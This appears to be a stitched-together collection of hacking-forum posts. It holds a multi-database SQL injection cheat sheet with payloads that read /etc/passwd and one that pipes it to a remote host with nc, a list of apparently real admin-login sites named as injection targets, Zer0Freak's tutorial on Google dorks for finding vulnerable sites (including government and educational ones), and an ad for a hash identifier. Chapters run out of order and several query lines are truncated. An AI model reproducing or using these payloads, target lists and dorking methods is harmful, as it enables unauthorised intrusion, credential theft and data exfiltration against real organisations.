SELECT cast('123' AS char);
SELECT IF(1=1
' UNION ALL SELECT LOAD_FILE('/etc/passwd') AND 'a'='a
union SELECT LOAD_FILE(0x2f6574632f706173737764)
load data infile 'c:/boot.ini' into table foo;
# SELECT ... INTO DUMPFILE
SELECT login || '-' || password FROM members
select versionnumber
select user from sysibm.sysdummy1;
select session_user from sysibm.sysdummy1;
select system_user from sysibm.sysdummy1;
select * from syscat.tabauth;
select current server from sysibm.sysdummy1;
select * from syscat.dbauth where grantee = current user;
select * from syscat.tdbauth where grantee = current user;
select name from sysibm.systables;
select name
SELECT schemaname FROM syscat.schemata;
SELECT foo FROM bar fetch first 1 rows only;
select name from (SELECT name FROM sysibm.systables order by name fetch first N+M-1 rows only) sq order by name desc fetch first N rows only;
select 123 from sysibm.sysdummy1 union select 234 from sysibm.sysdummy1;
SELECT 'a' concat 'b' concat 'c' FROM sysibm.sysdummy1;
SELECT cast('123' as integer) FROM sysibm.sysdummy1;
select version();
select current_database();
select current_user;
select session_user;
SELECT current_setting('data_directory');
select current_setting('log_connections');
select current_setting('log_statement');
select current_setting('port');
select current_setting('password_encryption');
select current_setting('krb_server_keyfile');
select current_setting('virtual_host');
select current_setting('port');
select current_setting('config_file');
select current_setting('hba_file');
select current_setting('data_directory');
LIMIT n
SELECT pg_sleep(10);
SELECT current_database()
SELECT relname
SELECT c.relname FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('r'
SELECT DISTINCT relname FROM pg_class C
SELECT 1; --comment
SELECT /*comment*/1;
SELECT chr(65);
SELECT ascii('A');
SELECT CHR(65)||CHR(66);
SELECT usename
SELECT usename FROM pg_user WHERE usesuper IS TRUE
SELECT system('cat /etc/passwd | nc 10.0.0.1 8080');
SELECT 'A' || 'B';
SELECT CAST(1 as varchar);
SELECT CAST('1' as int);
SELECT * FROM dblink('host=put.your.hostname.here user=someuser  dbname=somedb'
select dbmsinfo('_version');
select dbmsinfo('session_user');
select dbmsinfo('system_user');
select dbmsinfo('database');
select dbmsinfo('db_admin');
select dbmsinfo('create_table');
select dbmsinfo('create_procedure');
select dbmsinfo('security_priv');
select dbmsinfo('select_syscat');
select dbmsinfo('db_privileges');
select dbmsinfo('current_priv_mask');
select top 10 blah from table;
select first 10 blah form table;
select table_name
select relid
select relid
select column_name
select 1 union select 2;
select cast('123' as integer);
select @@version
select name from master..syslogins
select name from master..sysdatabases
convert(integer
waitfor delay '0:0:5'

MySQL versions lower than 5, i.e. version 4, do support UNION (from 4.0) but have no information_schema, so the table and column names that the version 5 style queries above read from information_schema have to be guessed instead.
Looking for a test or challenge?
Try Stewie's hack test: http://www.stewie390.info/hack_tests/lvl5/homepage.php
Here are some sites you can test on:
Code:
http://www.amskrupajal.org/AdminLogin.asp
http://www.csimatrichss.org/adminpage.asp
http://www.preventivecardiology.in/adminlogin.asp
http://pndllc.com/pndllc/admin/adminlogin.asp
http://www.singleusemedical.com/admin/adminLogin.asp
http://www.ringjordan.com/admin.asp
http://sunmarytrust.org/adminlogin.asp
I tried injecting all of them and it worked, so it should work for you too
Good luck

End of Chapter 2
Upcoming Chapter 3:
Union Based/Normal SQL injection
 

Creating/Using Dorks in SQL injection


Tutorial by Zer0Freak
For Beginners
A method of finding websites vulnerable to SQL injection is using what we call "dorks"
Dorks: they are like search criteria; a search engine returns the results that match your dork.
The process can be a little time consuming, but the outcome will be worth it once you learn how to use dorks


For this tutorial, the search engine we'll be using is Google
Credits to those who are mentioned in this tutorial
Now I'll show you how to use dorks with the help of a video too.


Step1: Finding your dorks i.e. the criteria you'll be using
Dork List compiled by kobez-
Code:
http://pastebin.com/0FqmasC7

Dork List by Sidesipe-
Code:
http://pastebin.com/x1rtqktj

Dork List by .Newsletter'
Code:
http://pastebin.com/APxqavu9

For this tutorial, we'll be using this dork "inurl:index.php?id="


Step2: Making use of your Dorks with the help of Google

Here's what you do:
  • Go to http://www.google.com
  • Type the dork in the search bar "inurl:index.php?id=" (with or without quotes)
  • Now you'll find a whole lot of links in your results

Here's how you can speed up the process:
Your mouse should have a scroll wheel, right?
Hover over each link and click the scroll wheel so that it opens in a new tab. (Let's say you open about 10 links at a time)


Step3: Vulnerability approach

Now to see whether the website is vulnerable to SQL injection or not, we simply put in a quote " ' " at the end of the url address.
So our site will look like this
Code:
http://www.site.com/index.php?id=123'

Do the same thing with the websites you opened on your tabs and see if there's any vulnerable website.

If the website is vulnerable, the page should return a database error (or break noticeably)!

Note: If you can't find any vulnerability after doing some vulnerability search on this dork, you can always browse the dork list I've mentioned above and use any of them until you find any website vulnerable to SQL injection

Here's a video demonstration on how to use Dorks:







Extra Notes: Hunting for specific websites with specific domains
Ever want to hack a government website, or an organization website?
It's simple. All you have to do is improvise your dorks.
First off, here are some common domains
.gov = Government websites
.edu = Educational websites
.org = Organizational websites
.com = Commercial websites
.info = Informative websites
.net = Networking websites ( similar to .com)

Alright now you know some specific domains, lets add them to our dork shall we?
Follow this formula-like dork
Code:
inurl:.DOMAIN/DORK
So you would normally understand it like this:
"inurl:" = the Google operator that matches text appearing in the page's URL
"DOMAIN" = your desired domain, ex. .gov
"DORK" = your dork of choice
Now for an example, lets say you want to hack government websites
Here's how it'll look
"inurl:.gov/index.php?id="
Once you search that up, you'll find a lot of government websites on your results

Changing "inurl" and using another one
Yes, you can change that too.
Google has a lot of functions you can come up with
Some of them are below where you can change "inurl" and make another dork
Code:
intitle:
intext:
define:
site:
info:
link:
Credits to Real Steel for bringing this up
Choose any of them and make another dork.
Example: "intext:.edu/gallery?id="
More information about those here: http://www.hackforums.net/showthread.php?tid=2033496





 


Some Dork Scanners you can use to help you speed up the process

Scanner by moveax
http://www.hackforums.net/showthread.php?tid=1985016

Scanner by p0iz0ner
http://www.hackforums.net/showthread.php...SQL+poizon

Scanner by kript0x

http://www.hackforums.net/showthread.php...rk+scanner

If you're lazy about using dorks to find vulnerable websites, then you can use a list right here:

Vulnerable List by Dyme:
http://pastebin.com/kVMYX0Eh

End of Chapter 1
Upcoming chapters:

Chapter2- Basic MySQL injection using "Login" Queries"
Please stay tuned to my tutorials; I hope you enjoyed this chapter
Zer0Freak
 

Zer0Freak's Hash Identifier/Detector has been released, version 1.0.0.1

Details:
Programmed in VB.Net
Will be done on C# and C++ soon
Version: 1.0.0.1
Copyright © ZeroFreak 2012
Hashes it can Detect:
MD5
SHA-1
SHA-256
SHA-384
SHA-512
MySQL
MySQL 5
DES(Oracle)
DES(Unix)
MD5(Unix)
MD5(APR)
MD5(phpBB3)
MD5(Wordpress)
SHA-256(Unix)
SHA-512(Unix)
MD5(Base-64)
SHA-1(Base-64)
SHA-224(Base-64)
SHA-512(Base-64)
SHA-256(Base-64)

More known hashes coming soon
Next version features:

More hashes will be added specially hashes with Salts
Tips on cracking those hashes too
Hash cracking tips and websites etc.

Preview of the Identifier:




Very friendly GUI and easy to use
Download it here: http://adf.ly/4mfy1

Source code will be released soon
zerofreak@live.com